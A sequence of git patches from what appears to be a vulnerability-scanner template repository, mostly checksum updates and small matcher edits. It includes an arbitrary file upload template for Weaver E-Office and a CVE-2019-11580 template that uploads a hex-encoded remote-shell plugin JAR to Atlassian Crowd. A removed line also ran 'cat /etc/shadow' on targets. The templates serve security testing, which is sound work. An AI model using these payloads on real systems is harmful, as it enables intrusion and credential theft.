+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7039,7 +7040,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:ab1228b24cb1a41c08aca33d762c54d6a172ff79 +templates-checksum.txt:e4d05dcbad71779760c1d0cc43e3a9c06b2f219a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From f646195fff517815eef91371098716607a33d44e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Sep 2023 13:17:45 +0530 Subject: [PATCH 0136/1090] Create weaver-eoffice-file-upload.yaml --- .../eoffice/weaver-eoffice-file-upload.yaml | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml diff --git a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml new file mode 100644 index 0000000000..3671a80a29 --- /dev/null +++ b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml @@ -0,0 +1,56 @@ +id: weaver-eoffice-file-upload + +info: + name: Weaver E-Office v9.5 - Arbitrary File Upload + author: princechaddha + severity: high + description: | + Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization. + reference: + - https://github.com/RCEraser/cve/blob/main/Weaver.md + tags: e-office,weaver,intrusive,fileupload + +variables: + filename: '{{rand_base(7, "abc")}}' + +http: + - raw: + - | + POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt + + ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt + Content-Disposition: form-data; name="upload_quwan"; filename="{{filename}}.phP" + Content-Type: image/jpeg + + {{randstr}} + ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt + Content-Disposition: form-data; name="file"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt-- + + - | + GET /attachment/{{id}}/{{filename}}.phP HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '{{randstr}}' + + extractors: + - type: regex + name: id + part: body + group: 1 + internal: true + regex: + - '\\\/attachment\\\/([0-9]+)\\\/' From 203b23625842031988ab50e3494996e45a9cc068 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 5 Sep 2023 13:52:15 +0530 Subject: [PATCH 0137/1090] update matcher --- http/token-spray/api-notolytix.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/token-spray/api-notolytix.yaml b/http/token-spray/api-notolytix.yaml index cbadfbb759..3f2186f63e 100644 --- a/http/token-spray/api-notolytix.yaml +++ b/http/token-spray/api-notolytix.yaml @@ -20,8 +20,8 @@ http: - type: word part: body words: - - 'realIp' - - 'route' - - 'deviceId' - - 'personaId' + - 'realIp":' + - 'route":' + - 'deviceId":' + - 'personaId":' condition: and From 6d4ed9056576d5c958d276e10b612b7994435352 Mon Sep 17 00:00:00 2001 From: Laronax Date: Tue, 5 Sep 2023 11:59:31 +0300 Subject: [PATCH 0138/1090] Update zip-backup-files.yaml new file name added Template Validation I've validated this template locally? YES Additional Details (leave it blank if not applicable) This template is trying to find backup files. In the "filename" part, I added the "inetpub". So, now it can find inetpub.zip, inetpub.rar etc.. I recently find an inetpub.zip in a website so I think, It ll be usefull. --- http/exposures/backups/zip-backup-files.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index 208023e87c..e8f8b03965 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -45,6 +45,7 @@ http: - "bak" - "old" - "Release" + - "inetpub" EXT: - "7z" From 85d55af2f1b56fb00120f341a307cf27f450e187 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Sep 2023 14:34:47 +0530 Subject: [PATCH 0139/1090] Update CVE-2019-11580.yaml --- http/cves/2019/CVE-2019-11580.yaml | 42 ++++++++++++++++++------------ 1 file changed, 26 insertions(+), 16 deletions(-) diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index cd182ab915..aba3dc5b68 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -1,7 +1,7 @@ id: CVE-2019-11580 info: - name: Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution + name: Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution author: dwisiswant0 severity: critical description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. @@ -14,30 +14,40 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-11580 - epss-score: 0.97501 + epss-score: 0.97491 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* - epss-percentile: 0.99963 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: crowd - tags: packetstorm,kev,cve,cve2019,atlassian,rce + tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth + +variables: + plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}' http: - - method: GET - path: - - "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow" + - raw: + - | + POST /crowd/admin/uploadplugin.action HTTP/2 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7 + Expect: 100-continue + + ------------------------------f15fe87e95a7 + Content-Disposition: form-data; name="file_cdl"; filename="rce.jar" + Content-Type: application/octet-stream + + {{plugin}} + ------------------------------f15fe87e95a7-- + + - | + GET /crowd/plugins/servlet/exp HTTP/2 + Host: {{Hostname}} - matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - - "root:*:" - - "bin:*:" - condition: and - - - type: status - status: - - 200 + - "CVE-2019-11580" From a7db05dd52ed55b7b9aff2d65ec0d83b8c6dd951 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 11:56:48 +0000 Subject: [PATCH 0141/1090] Auto Generated Templates Checksum [Tue Sep 5 11:56:48 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5c6007aa16..8797b6f7ac 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3483,7 +3483,7 @@ http/exposed-panels/sauter-moduwebvision-panel.yaml:b83910490f24a5c81ba7058dc742 http/exposed-panels/scriptcase/scriptcase-panel.yaml:9479327ed20d4d3d49a22a89830db9da1246d3e3 http/exposed-panels/scriptcase/scriptcase-prod-login.yaml:c7f1b57597ebd9e1d165aa3879917f548ec21228 http/exposed-panels/scs-landfill-control.yaml:6f61c0b4a107422bac2a9bf2f79c26272704f2e1 -http/exposed-panels/seafile-panel.yaml:017e3202b38ff2668cd38ba99199cf891edcc3aa +http/exposed-panels/seafile-panel.yaml:0920f887a1c221ab6f23dd74db9e13c7c77b69fb http/exposed-panels/seagate-nas-login.yaml:f7969f37199508a8d17312e54b75f611fde5dae3 http/exposed-panels/seats-login.yaml:efe16450d60f592f82402a63f9f510fee4c647b9 http/exposed-panels/secmail-detect.yaml:35bce19b677ab39750d00606b5889511fbac03fc @@ -7040,7 +7040,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:e4d05dcbad71779760c1d0cc43e3a9c06b2f219a +templates-checksum.txt:7f37ea48cea4b94ac0cda9a9409ad9fb9e9754a7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 3e9e60b453dda9179539c841dc6a4b749b14db9c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 12:10:16 +0000 Subject: [PATCH 0143/1090] Auto Generated Templates Checksum [Tue Sep 5 12:10:16 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8797b6f7ac..dd5752e02a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1470,7 +1470,7 @@ http/cves/2020/CVE-2020-1956.yaml:689f1898a8fe3ce527db226b9f4bc6808e84fb60 http/cves/2020/CVE-2020-19625.yaml:7e8a552a898ef652ec5b7a34790f7829b27fdbff http/cves/2020/CVE-2020-20285.yaml:8f01c22fbccf4c805753c9c5046d754474dde7cf http/cves/2020/CVE-2020-20300.yaml:4bf5aedb9d82f1b99913c97487d9c17095173c23 -http/cves/2020/CVE-2020-2036.yaml:12a33dc690d72330b93f977466d22605e17e8137 +http/cves/2020/CVE-2020-2036.yaml:d70691b457d23f9e14ed21fe25f86d22a71ae070 http/cves/2020/CVE-2020-2096.yaml:388b333ac57cc01ee709edf274b6e21106190dd6 http/cves/2020/CVE-2020-20982.yaml:88492de9e885210eb91a8443664cd122ee9de6fa http/cves/2020/CVE-2020-20988.yaml:3aeae58e64cccc6cbd4f9909344c98a2aa9a05dd @@ -7040,7 +7040,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:7f37ea48cea4b94ac0cda9a9409ad9fb9e9754a7 +templates-checksum.txt:1788dcada2550f9eeafe931a91a63256e50b2e6d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 628c6318c90d8a17fe48cc401363b03065c96559 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 5 Sep 2023 17:42:19 +0530 Subject: [PATCH 0144/1090] Update snapcomms-panel.yaml --- http/exposed-panels/snapcomms-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/snapcomms-panel.yaml b/http/exposed-panels/snapcomms-panel.yaml index 9aff3761c8..1dde065c43 100644 --- a/http/exposed-panels/snapcomms-panel.yaml +++ b/http/exposed-panels/snapcomms-panel.yaml @@ -23,7 +23,7 @@ http: - type: word part: body words: - - ' SnapComms Content Manager' + - 'SnapComms Content Manager' - type: status status: From 197bf4ba685f48c1dd631ddfcbc0c24ddd1dd3b9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 5 Sep 2023 17:55:45 +0530 Subject: [PATCH 0145/1090] Completed Assigned templates - DhiyaneshDK --- .../o2oa/o2oa-default-login.yaml | 34 +++++++--- .../others/cnzxsoft-default-login.yaml | 37 +++++++++++ ...ity-management-system-default-account.yaml | 29 --------- .../seeyon/seeyon-a8-default-login.yaml | 47 ++++++++++++++ .../seeyon/seeyon-monitor-default-login.yaml | 41 ++++++++++++ .../smartbi/smartbi-default-login.yaml | 55 ++++++++++++++++ http/default-logins/wayos/ac-weak-login.yaml | 56 ++++++++++++++++ .../other/sanhui-smg-file-read.yaml | 29 +++++---- .../other/seeyon-oa-log4j.yaml | 47 ++++++++++++++ .../other/zhixiang-oa-msglog-sqli.yaml | 23 +++---- .../qax/secsslvpn-auth-bypass.yaml | 41 ++++++++++++ .../qax/unauthenticated-qax-vpn-access.yaml | 25 -------- .../realor-gwt-system-sql-injection.yaml | 40 ------------ .../realor/realor-gwt-system-sqli.yaml | 42 ++++++++++++ .../ruijie/ruijie-nbr-fileupload.yaml | 41 ++++++++++++ .../ruijie-nbr-router-fileupload-upload.yaml | 30 --------- .../sangfor/sangfor-ad-rce.yaml | 29 --------- .../sangfor/sangfor-login-rce.yaml | 33 ++++++++++ .../secworld/secgate-3600-file-upload.yaml | 64 +++++++++++++++++++ ...secworld-secgate-3600-firewall-upload.yaml | 56 ---------------- .../seeyon/seeyon-ajax-unauth.yaml | 40 ------------ .../seeyon/seeyon-config-infoleak.yaml | 35 ++++++++++ .../seeyon/seeyon-createmysql-infoleak.yaml | 39 +++++++++++ 